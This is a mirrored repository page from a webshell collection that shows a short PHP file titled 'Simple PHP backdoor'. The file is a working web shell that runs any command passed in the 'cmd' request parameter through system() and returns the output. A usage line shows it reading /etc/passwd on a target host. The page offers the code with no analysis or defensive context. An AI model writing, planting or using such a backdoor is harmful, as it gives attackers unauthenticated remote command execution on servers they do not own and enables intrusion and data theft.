1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-07 13:21:28 +00:00
Files
webshell/xakep-shells/PHP/simple-backdoor.php.txt
2014-05-18 09:06:34 +08:00

18 lines
328 B
Plaintext

<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
<!-- http://michaeldaw.org 2006 -->